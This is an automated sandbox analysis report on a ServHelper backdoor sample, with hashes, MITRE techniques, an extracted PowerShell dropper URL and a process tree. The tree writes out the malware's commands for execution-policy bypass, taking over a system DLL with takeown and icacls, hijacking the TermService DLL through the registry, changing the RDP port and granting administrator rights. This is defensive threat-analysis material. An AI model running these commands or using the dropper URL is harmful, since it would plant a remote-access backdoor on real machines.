servhelper | 8418c39d82911d39bae75090677ce1f259382a64d784e86acf31a6d9ba0ce3d9

Analysis

max time kernel
92s
max time network
99s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
03-04-2024 01:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9c3e078b4506224ea8070d01294de9ac_JaffaCakes118.exe
Size

5.7MB
MD5

9c3e078b4506224ea8070d01294de9ac
SHA1

7816a2f30124873106386e8b5b0dfb476d1debef
SHA256

8418c39d82911d39bae75090677ce1f259382a64d784e86acf31a6d9ba0ce3d9
SHA512

46e44917d8d1abe4228dc3f73b8cfb5507d99766fffa2b4a798e805e506aceed531bfa5b27a1e6f87fb59b71e32f21e75846ad300d8dc77ffcd2a0ff5a273bd4
SSDEEP

49152:aEs7HCrb/T/vO90dL3BmAFd4A64nsfJdBOGm5K6UVJ9eLZNVj/lHoRQ1wYr9MYEd:aEQjgGHmAQQQQQQQQQQQQQdC

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow pid process

24 396 powershell.exe
26 396 powershell.exe
28 396 powershell.exe
31 396 powershell.exe
35 396 powershell.exe
37 396 powershell.exe
39 396 powershell.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid process

1572 icacls.exe
2284 icacls.exe
3848 icacls.exe
2588 icacls.exe
1400 icacls.exe
3184 icacls.exe
3004 takeown.exe
3644 icacls.exe

flow	pid	process
24	396	powershell.exe
26	396	powershell.exe
28	396	powershell.exe
31	396	powershell.exe
35	396	powershell.exe
37	396	powershell.exe
39	396	powershell.exe

pid	process
1572	icacls.exe
2284	icacls.exe
3848	icacls.exe
2588	icacls.exe
1400	icacls.exe
3184	icacls.exe
3004	takeown.exe
3644	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

2028
2028
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

3004 takeown.exe
1572 icacls.exe
2284 icacls.exe
3848 icacls.exe
2588 icacls.exe
1400 icacls.exe
3184 icacls.exe
3644 icacls.exe

pid	process
2028
2028

pid	process
3004	takeown.exe
1572	icacls.exe
2284	icacls.exe
3848	icacls.exe
2588	icacls.exe
1400	icacls.exe
3184	icacls.exe
3644	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

23 raw.githubusercontent.com
24 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
23	raw.githubusercontent.com
24	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI5F77.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI5F78.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_i0gmeaiu.luz.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI5F67.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_2xdbcyts.m2v.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI5F56.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI5F89.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

4512 WMIC.exe

pid	process
4512	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4668 reg.exe
Runs net.exe

pid	process
4668	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	26	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4116	powershell.exe
4116	powershell.exe
3272	powershell.exe
3272	powershell.exe
3112	powershell.exe
3112	powershell.exe
4480	powershell.exe
4480	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
396	powershell.exe
396	powershell.exe
396	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

656
656

pid	process
656
656

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4116	powershell.exe
Token: SeDebugPrivilege	3272	powershell.exe
Token: SeDebugPrivilege	3112	powershell.exe
Token: SeDebugPrivilege	4480	powershell.exe
Token: SeRestorePrivilege	3644	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	4512	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4512	WMIC.exe
Token: SeAuditPrivilege	4512	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4512	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4512	WMIC.exe
Token: SeAuditPrivilege	4512	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2588	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2588	WMIC.exe
Token: SeAuditPrivilege	2588	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2588	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2588	WMIC.exe
Token: SeAuditPrivilege	2588	WMIC.exe
Token: SeDebugPrivilege	396	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

9c3e078b4506224ea8070d01294de9ac_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 3068 wrote to memory of 4116	3068	9c3e078b4506224ea8070d01294de9ac_JaffaCakes118.exe	powershell.exe
PID 3068 wrote to memory of 4116	3068	9c3e078b4506224ea8070d01294de9ac_JaffaCakes118.exe	powershell.exe
PID 4116 wrote to memory of 3804	4116	powershell.exe	csc.exe
PID 4116 wrote to memory of 3804	4116	powershell.exe	csc.exe
PID 3804 wrote to memory of 860	3804	csc.exe	cvtres.exe
PID 3804 wrote to memory of 860	3804	csc.exe	cvtres.exe
PID 4116 wrote to memory of 3272	4116	powershell.exe	net1.exe
PID 4116 wrote to memory of 3272	4116	powershell.exe	net1.exe
PID 4116 wrote to memory of 3112	4116	powershell.exe	powershell.exe
PID 4116 wrote to memory of 3112	4116	powershell.exe	powershell.exe
PID 4116 wrote to memory of 4480	4116	powershell.exe	cmd.exe
PID 4116 wrote to memory of 4480	4116	powershell.exe	cmd.exe
PID 4116 wrote to memory of 3004	4116	powershell.exe	takeown.exe
PID 4116 wrote to memory of 3004	4116	powershell.exe	takeown.exe
PID 4116 wrote to memory of 1572	4116	powershell.exe	icacls.exe
PID 4116 wrote to memory of 1572	4116	powershell.exe	icacls.exe
PID 4116 wrote to memory of 3644	4116	powershell.exe	cmd.exe
PID 4116 wrote to memory of 3644	4116	powershell.exe	cmd.exe
PID 4116 wrote to memory of 3184	4116	powershell.exe	icacls.exe
PID 4116 wrote to memory of 3184	4116	powershell.exe	icacls.exe
PID 4116 wrote to memory of 2284	4116	powershell.exe	icacls.exe
PID 4116 wrote to memory of 2284	4116	powershell.exe	icacls.exe
PID 4116 wrote to memory of 1400	4116	powershell.exe	icacls.exe
PID 4116 wrote to memory of 1400	4116	powershell.exe	icacls.exe
PID 4116 wrote to memory of 2588	4116	powershell.exe	WMIC.exe
PID 4116 wrote to memory of 2588	4116	powershell.exe	WMIC.exe
PID 4116 wrote to memory of 3848	4116	powershell.exe	icacls.exe
PID 4116 wrote to memory of 3848	4116	powershell.exe	icacls.exe
PID 4116 wrote to memory of 4352	4116	powershell.exe	reg.exe
PID 4116 wrote to memory of 4352	4116	powershell.exe	reg.exe
PID 4116 wrote to memory of 4668	4116	powershell.exe	reg.exe
PID 4116 wrote to memory of 4668	4116	powershell.exe	reg.exe
PID 4116 wrote to memory of 3296	4116	powershell.exe	reg.exe
PID 4116 wrote to memory of 3296	4116	powershell.exe	reg.exe
PID 4116 wrote to memory of 2692	4116	powershell.exe	net.exe
PID 4116 wrote to memory of 2692	4116	powershell.exe	net.exe
PID 2692 wrote to memory of 3728	2692	net.exe	net1.exe
PID 2692 wrote to memory of 3728	2692	net.exe	net1.exe
PID 4116 wrote to memory of 216	4116	powershell.exe	cmd.exe
PID 4116 wrote to memory of 216	4116	powershell.exe	cmd.exe
PID 216 wrote to memory of 1500	216	cmd.exe	cmd.exe
PID 216 wrote to memory of 1500	216	cmd.exe	cmd.exe
PID 1500 wrote to memory of 1980	1500	cmd.exe	net.exe
PID 1500 wrote to memory of 1980	1500	cmd.exe	net.exe
PID 1980 wrote to memory of 3188	1980	net.exe	net1.exe
PID 1980 wrote to memory of 3188	1980	net.exe	net1.exe
PID 4116 wrote to memory of 4388	4116	powershell.exe	cmd.exe
PID 4116 wrote to memory of 4388	4116	powershell.exe	cmd.exe
PID 4388 wrote to memory of 4108	4388	cmd.exe	cmd.exe
PID 4388 wrote to memory of 4108	4388	cmd.exe	cmd.exe
PID 4108 wrote to memory of 5068	4108	cmd.exe	net.exe
PID 4108 wrote to memory of 5068	4108	cmd.exe	net.exe
PID 5068 wrote to memory of 1456	5068	net.exe	net1.exe
PID 5068 wrote to memory of 1456	5068	net.exe	net1.exe
PID 208 wrote to memory of 1836	208	cmd.exe	net.exe
PID 208 wrote to memory of 1836	208	cmd.exe	net.exe
PID 1836 wrote to memory of 2248	1836	net.exe	net1.exe
PID 1836 wrote to memory of 2248	1836	net.exe	net1.exe
PID 4332 wrote to memory of 4052	4332	cmd.exe	net.exe
PID 4332 wrote to memory of 4052	4332	cmd.exe	net.exe
PID 4052 wrote to memory of 4412	4052	net.exe	net1.exe
PID 4052 wrote to memory of 4412	4052	net.exe	net1.exe
PID 784 wrote to memory of 4960	784	cmd.exe	net.exe
PID 784 wrote to memory of 4960	784	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\9c3e078b4506224ea8070d01294de9ac_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\9c3e078b4506224ea8070d01294de9ac_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4116
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m2r3sqkf\m2r3sqkf.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3804
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES41DB.tmp" "c:\Users\Admin\AppData\Local\Temp\m2r3sqkf\CSCC7A1944EE5224208ACC824451F7EF9.TMP"
      4⤵
      PID:860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3272
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4480
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3004
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1572
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3644
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3184
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2284
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1400
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2588
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3848
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:4352
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:4668
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:3296
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:3728
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:216
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1500
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1980
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:3188
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
